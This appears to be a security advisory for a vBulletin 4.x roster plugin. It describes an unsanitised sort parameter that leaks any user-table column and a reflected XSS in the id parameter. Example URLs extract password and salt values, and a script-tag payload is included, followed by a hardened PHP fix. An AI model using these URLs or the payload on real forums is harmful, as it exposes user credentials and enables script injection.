Plugin: http://www.vbulletin.org/forum/showthread.php?t=235326
Version: 4.0.10 (latest)
vB version: 4.x.x

#1 Data Extraction

Vulnerable code in showroster.php:

// ###GROUPCACHE#################################################################
if ($userinfo['userid']) {
    $t = strtoupper($userinfo[$sortgroupfield]);
    $u = strtoupper($userinfo[$sortuserfield]);
    $groupcache["$t"]["$u"] = $userinfo;
}

As you can see, the variable $t holds the value of $userinfo[$sortgroupfield]. The $sortgroupfield value is taken from the URL, which any user can change. Later on, the script iterates over the $groupcache array and assigns the variables to the showroster template. The problem is that $sortgroupfield is neither sanitized nor checked, and since $userinfo contains every column of the user table, any column of a given user can be extracted by changing the URL to something like:

http://example.com/showroster.php?or...field=password
or
http://example.com/showroster.php?or...roupfield=salt

The only downside is that the user must be shown in the roster and that only one column can be extracted at a time.

Proof: http://example.com/showroster.php?or...field=password will show something like this

#2 Cross Site Scripting

The GET variable id is prone to XSS.

Proof: http://example.com/showroster.php?order=asc&sortgroupfield=field1&id="><script>alert("XSS")</script>

This will alert xss several times on the screen. Any type of HTML/JavaScript can be injected.
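Both findings come down to missing input validation and missing output encoding, so here is a hardened version of the same GROUPCACHE logic. This is an added example, not code from the showroster plugin or from vBulletin: the sort field names are checked against a fixed allowlist of columns the roster is meant to display, only those display columns are copied into the cache, and the id parameter is HTML-escaped before it is echoed. The allowlist contents, the sample user rows and the surrounding request handling are assumptions made for the example.

```php
<?php
// Added example, not the plugin's showroster.php. The column names in the
// allowlist and the sample rows below are assumptions for illustration.
$allowedSortFields = array('username', 'joindate', 'posts', 'usertitle');
$defaultGroupField = 'usertitle';
$defaultUserField  = 'username';

// Accept a sort field only if it is exactly one of the allowed column names.
// Anything else (missing, unknown, or a sensitive column such as password or
// salt) falls back to a safe default instead of being used as an array key.
function pick_sort_field(array $get, $key, array $allowed, $default)
{
    if (!isset($get[$key]) || !in_array($get[$key], $allowed, true)) {
        return $default;
    }
    return $get[$key];
}

$sortgroupfield = pick_sort_field($_GET, 'sortgroupfield', $allowedSortFields, $defaultGroupField);
$sortuserfield  = pick_sort_field($_GET, 'sortuserfield',  $allowedSortFields, $defaultUserField);

// Constructed sample rows standing in for rows read from the user table.
// They deliberately include columns that must never reach the template.
$userRows = array(
    array('userid' => 1, 'username' => 'alice', 'usertitle' => 'Admin',  'posts' => 10,
          'joindate' => 1262304000, 'password' => 'hash-not-for-display', 'salt' => 'salt-not-for-display'),
    array('userid' => 2, 'username' => 'bob',   'usertitle' => 'Member', 'posts' => 3,
          'joindate' => 1293840000, 'password' => 'hash-not-for-display', 'salt' => 'salt-not-for-display'),
);

// ###GROUPCACHE### with the same structure as the original, but the keys can
// only be allowlisted columns and the cached row is reduced to display columns.
$displayColumns = array('userid', 'username', 'usertitle', 'posts', 'joindate');
$groupcache = array();
foreach ($userRows as $userinfo) {
    if ($userinfo['userid']) {
        $t = strtoupper($userinfo[$sortgroupfield]);
        $u = strtoupper($userinfo[$sortuserfield]);
        // Cache only what the template needs, never the full user row.
        $groupcache[$t][$u] = array_intersect_key($userinfo, array_flip($displayColumns));
    }
}

// The id parameter is encoded for an HTML attribute context before output,
// so a value like "><script>...</script> is rendered as text, not markup.
$id     = isset($_GET['id']) ? $_GET['id'] : '';
$safeId = htmlspecialchars($id, ENT_QUOTES, 'UTF-8');
echo '<input type="hidden" name="id" value="' . $safeId . '">' . "\n";

// Hand the reduced cache to the template layer (stand-in for the real
// template assignment); no password or salt values are present in it.
foreach ($groupcache as $group => $members) {
    foreach ($members as $name => $row) {
        echo htmlspecialchars($group, ENT_QUOTES, 'UTF-8') . ' / '
           . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . ': '
           . implode(', ', array_keys($row)) . "\n";
    }
}
```

The allowlist is the key control: comparing the request value against known column names with strict equality means an attacker-controlled string is never used to index $userinfo, so the one-column-at-a-time disclosure described above is no longer possible regardless of what the URL contains. Encoding id for the attribute context it lands in closes the second finding.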